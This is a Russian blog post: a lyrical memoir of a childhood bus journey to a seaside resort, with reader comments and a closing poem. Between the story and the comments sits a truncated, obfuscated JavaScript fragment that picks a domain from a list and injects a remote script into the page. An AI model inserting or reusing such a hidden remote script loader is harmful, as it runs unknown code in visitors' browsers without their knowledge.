Дорога к морю. (Море)
Каждый год, летом, в определенный момент, происходит одно и то же: сумки, сборы, раннее пробуждение, быстрый завтрак, смех, беготня, гвалт, последние мелочи… Присели на дорожку… ну, тронулись!
Автобус набит под завязку сонными, шумными, суетливыми людьми, провизией, которой бы хватило, чтобы переждать ядерную войну в бункере, рыбацкими снастями… Свежий запах раннего утра возбуждает – впереди дорога!
Выехали за город, и за окном замелькали знакомые степные пейзажи. Редкие рощицы корявых акаций смиренно поглощали адские порции безжалостного солнца. Густая, местами по пояс, трава по обочинам была усеяна яркими пятнами цветущего шалфея, змееголовника, тысячелистника. Пахнущая чабрецом степь разнежилась, распласталась, разомлела, напитавшись теплом и светом.
Геометрически расчерченные поля и виноградники расстилались до самого горизонта и скрывались за ним, огибая земной шар. Сердце замирало от щемящего, восторженного, невнятного «я живу» и подпрыгивало на ухабах, а впереди ждало счастье длиною в жизнь.
Асфальт монотонно и убаюкивающе вползал серой лентой под колеса автобуса, а вдалеке постоянно маячила лужа, отчетливо видимая в струящемся летнем мареве. Кажется: вот сейчас настигнем, догоним! Но лужа исчезала, стоило приблизиться к ней, и нам приходилось ждать следующей лужи… В детских головах не укладывалось понятие «мираж», мы верили, что лужи настоящие и спорили, смеялись, тыча пальцами и удивляясь. Солнцу было еще далеко до зенита, но оно выкладывалось в полную силу. Жара. На небе ни облачка. Мы едем на море!!!
Огромная, соленая, притягательная лужа-мираж ждала меня. Я знала это всегда и наверняка. Море томно вздыхало и колыхалось в своих берегах, шелестело пенистой волной, откатывалось назад, чтобы поглядеть – скоро ли я приеду? Потом возвращалось на прежнее место и снова ждало, улыбаясь и ритмично ворочая ракушки уверенной хозяйской рукой. Море монотонно и нетерпеливо баюкало само себя в своей колыбели. Ему никто не был нужен, только я. Эта неразрывная, тяготящая, невозможно-страстная связь с морем у меня с детства.
Я не люблю жару, страдаю от колючего песка, от разъедающей кожу соли. Но если взять самый большой глобус и посмотреть на моё море издалека, то станет понятно, за что я люблю его. Море и я – вдвоем, на огромной тесной планете. Оно ждало меня, и я приехала. Мне целых тринадцать, и я готова поделиться с вечно юной лужей своим временем.
Держа сандалии в руке, медленно иду босиком по утрамбованным тропинкам пансионата, ноги постепенно покрываются тонким налетом светлой песчаной пыльцы; миную сиваш – отколовшийся и остро пахнущий кусочек моря, концентрат из соли, ила и гниющих водорослей, поросший по периметру камышом и рогозом, впитываю, вдыхаю терпко-йодистый запах летнего пиршества… И чувствую, что уже никогда не стану прежней. Море не отпустит меня, оно уже в крови, в душе, вторглось в мою плоть эротичной новеллой и останется там навсегда.
Бледные северяне, москвичи, акающие и непривычно растягивающие гласные в неожиданных местах, жадно глотают одуряющую жару. За ними интересно и смешно наблюдать. Дети играют в мяч, кто-то нетерпеливый уже развел огонь в мангале, слышится гитарный перебор, звенят стаканы, пахнет едой, у каждого порога – таз с водой, для мытья ног.
Все домики деревянные, на невысоких сваях. Между домиками натянуты веревки – на них сушатся плавки и крабы. Повсюду – дикие маслины, усеянные серебристыми листочками и вяжущими ягодами. Белые камни, пористый известняк, выносливые неприхотливые травы, юркие ящерицы, питьевой фонтанчик посреди площади, окруженный изумленной изумрудной порослью. Выцветшая под палящим солнцем картинка впечатана в мозг, как кадр из яркого фильма под чуткой режиссурой. Со временем устаешь от невыносимой жары и автоматически начинаешь передвигаться рефлекторными отрезками от тени к тени. От дерева – к навесу, а оттуда – к последнему ряду домиков, пригибаясь от едкого, изнуряющего, всевидящего солнечного лика. Обожженные песком ступни преодолевают последний поворот, и на меня обрушивается море.
Пляж усеян растаявшими телами. Слепяще-белый песок под ногами, иссиня-бездонное небо над головой, а между ними – море… как долгожданный приют, полный тайн и загадок. Звонкий голос мальчика, разносящего шашлычки из рапанов и мидий, перекрывает тихий шелест, что адресован лично мне – ради него я и приехала.
Оглушенная жарой и звенящими в раскаленном воздухе звуками, я прислушиваюсь к шелесту, бреду, загипнотизированная, не ощущая ног, плыву в знойном полуобморочном потоке жаркого притяжения… Шаг, еще один…. И я падаю в теплые обволакивающие объятия моря.
Ну, здравствуй. Я тоже тебя люблю.

<script type="text/javascript">// </script>
<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>
Комментарии
Вот ведь - в разных южных странах побывала, а тот зной, пропитанный запахами сухих трав, прошитый стрекотом цикад, все равно кажется особенным. Выцветшая картинка сильнее яркого глянца.
Благодарю от души за столь душевный, теплый отзыв, Marguerite.
Чудесный путь к морю, путь к самому себе!
Спасибо, Людочка!
Мне очень приятно, что тебе понравилось, Инна )
Как приятен твой отзыв... айда купаться чтоле? ))
Поэтому просто бесило, когда всё и всех вокруг заливает, а мы не знаем, куда от жары деться.
Сейчас днём 30-32, но это для нас уже - прохладно.
Марк, насчет "не сумлевайся".. Я, все-таки, меряю собственными понятиями и ощущениями - лично мне подобную тягомотину было бы скучно читать. Ее и писать-то интересно только ради освежения воспоминаний. И порадовать подобная писанина может тебя и таких, как ты )))) И в немалой степени - из-за личного знакомства.
Рада, что вам понравилось, Мох.
Не хочу повторять избитую истину про краткость, надеюсь, знаете.
А с ненавистью завязывайте, батенька, разрушительная это штуковина.
Честно говоря, я не совсем поняла, чем недоволен товарищ... я же не афоризмы на скрижали пропихиваю... пишу себе, что в голову взбредет... не ндра - не читай, бог с тобой. А тут такие предъявы недетские ))))
Спасиб тебе, сонечко ))
Мне всегда было удивительно, что нас, москвичей, стремящихся летом к морю, как то по говору отличают. Мне казалось, мы одинаково говорим. как все. :-)
А давным давно мы тоже на А говорили и сильно растягивали слова? Мне кажется , недавно только это в моду вошел этот говорок, уже после перестройки...
Но. Когда я была в пионерском лагере - парой лет раньше - это явление уже присутствовало. Помню, как мы поддразнивали девочку из России - специально задавали ей вопросы, на которые она, устав от нас, отвечала протяжно - "Ааай, да атстаньте уже!"
Мы умирали со смеху )))
Как помню? Закрываю глаза и все как на ладони ))) Спасибо, что зашла ко мне, Танечка.
https://www.youtube.com/watch?v=Dd9nHgqH1SM
Вдыхать глубоко, естеством, как вдыхает прибой,
Срастаясь душой, развеваясь его парусами,
Быть небом, и ветром, и солью, и пеной морской.
Не думать о том, что закончилось быстрое лето,
Что поезд ползет по ущелью зеленым ужом,
Что сумки готовы, и в правом кармане билеты,
И что не бывает подолгу душе хорошо.
Купить молодого вина и букетик лаванды,
Тихонько, под нос, напевая упрямый мотив
Про полные свежей кефали ночные шаланды,
Все восемь куплетов – до строчки одной упростив.
И выйти на пирс, и подальше забросить монету,
Смотреть, как летит, кувыркаясь, над синей водой.
Нырнула на дно! И закончилось быстрое лето.
И поезд у пирса. И чайка над горной грядой.
И ехать, и ехать туда, где дожди и туманы,
Четыре стены, разговор бесконечно пустой,
Звонки на мобильный, ночные коктейли, кальяны,
И чай из лаванды. Той самой. И, все же, не той.
На смуглой руке полоса от морского браслета,
От лампы, нагретой свечой, можжевеловый дух.
Зеленые камешки, книжка морского поэта.
И окна на север. Но дверь, слава Богу, на юг.
Но стоит вдохнуть глубоко и глаза призакрыть,
Я вижу – летит над волной, кувыркаясь, монетка...
И, может быть, кто его знает... Ведь все может быть.